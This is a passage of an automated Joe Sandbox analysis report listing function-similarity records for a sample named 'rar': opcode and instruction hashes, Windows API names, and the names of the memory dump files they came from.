                                                                                                                                                                                                                                                • Instruction ID: fac5a96e22414a53f914ca2ec2590f195157193c9e1cef59b15d2c2ac12c796c
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 64F06221B3859142FA709B60F8153FA6264BFA8784F904031F9CDC26A9EE2CD2489A10
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$AffinityCurrentMask
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1231390398-0
                                                                                                                                                                                                                                                • Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                                • Instruction ID: d936b3dec4c8ca4c2b44436e619013a09410f8265ce19a5e58218de746fb13e4
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B1E0D161B3457147DBD85769E495FAD1390EF64B80F906035F40FC3B54DD1DD5489B00
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 485612231-0
                                                                                                                                                                                                                                                • Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                • Instruction ID: d61b8b8185d411dd58f58b6ed07352c5e1e58ee307feb65514f632e2d9aaccc8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 94E08660E3996342FF48A7F2740517412906FB4744F244038F92DC6252EE2C6C455244
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                                                • Instruction ID: 70a22a47efe67e778499ea276a796e4f4ac52211ee37a0f47ba5af279f2dc9b6
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D3E11221A2C6B285FB25AA20A4543BF2751EF71B88F240136FE4D8B7C6DE2DF455E710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
                                                                                                                                                                                                                                                • Instruction ID: 2f1e9059e6c0247c44d7338ec4917235a3e54e76b5b25ceb579855daecd1b2af
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F0514773528BE194E7019F74A8441ED37A8F754F88F2C423AEA884B79ADF395062C331
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3947729631-0
                                                                                                                                                                                                                                                • Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                • Instruction ID: 62d482c4a15e060816cad5296e20828fbb557204704d583e745a9e7d4607ccb3
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24418021E39A6382FB689B15F86017923A1AFB0B44F749439F90DC76A1DE3CEC45A341
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CommandLine
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3253501508-0
                                                                                                                                                                                                                                                • Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                • Instruction ID: c8afef85f3bd42f6158a7b53a456223b629cd4855da8d9a4d094d1f85863ddaa
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A501B91560C65285EA72F716A4203BE5660FFA5B94F780C31FE9D87369DE3FD4418700
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                • Instruction ID: a7b675aaf9180ccc6637e9e0c55b754bba6df9e923f2d8d7c8aaa36d23edeb23
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3D012C54A3DE6341FA649666BA4027911905FB4BE5F788238FD3DC62D6EE2DEC016201
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CompareString
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1825529933-0
                                                                                                                                                                                                                                                • Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                • Instruction ID: c6f40607ff23e570a4bd9e3693b180cba9cc2c14be29555a54a7b8c07a9337b0
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0401626172DBB245EA106F52B40406AE611BBA9FC0F694834FF8D8BB9ACF3CD5425704
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CloseFind
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1863332320-0
                                                                                                                                                                                                                                                • Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                                • Instruction ID: 072c107282aeb806c68932a493453b208efbe2210d1d1c9647f96a00b16a2a38
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32F02D329086D141DB0A9B7151553F923109F16BB4F284735FE7C4B3C7DE5D90C48710
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AllocateHeap
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1279760036-0
                                                                                                                                                                                                                                                • Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                • Instruction ID: f712ba2efaff2de349f7fef9ee4e060b37edd151a4f093de81c8023977a3d4df
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 86F08221B7DA7341FE546AB1784027522804FB47A1F290A38FD3EC53C6DE5DEC406214
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                • Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                • Instruction ID: 883ea956fc618f7da90cdb97b7ad12550f6c65ce01cf819db1fd5c217c0c56a8
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 89E04F60F9A32281FE5A2662287107D02411F76B80F345838EC2F86382DC1FA0991610
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
                                                                                                                                                                                                                                                • Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
